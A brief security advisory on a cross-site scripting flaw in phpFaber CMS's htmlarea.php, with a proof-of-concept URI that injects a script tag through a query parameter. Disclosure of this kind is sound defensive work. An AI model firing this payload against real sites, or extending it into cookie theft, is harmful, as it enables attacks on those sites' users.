phpFaber CMS Htmlarea.PHP Cross-Site Scripting Vulnerability

phpFaber CMS Htmlarea.PHP Cross-Site Scripting Vulnerability

An attacker can exploit this issue with a web client.

The following proof-of-concept URI is available:

http://www.example.com/cms_images/js/htmlarea/htmlarea.php?vigilon=>"><ScRiPt>alert("XSS")</ScRiPt>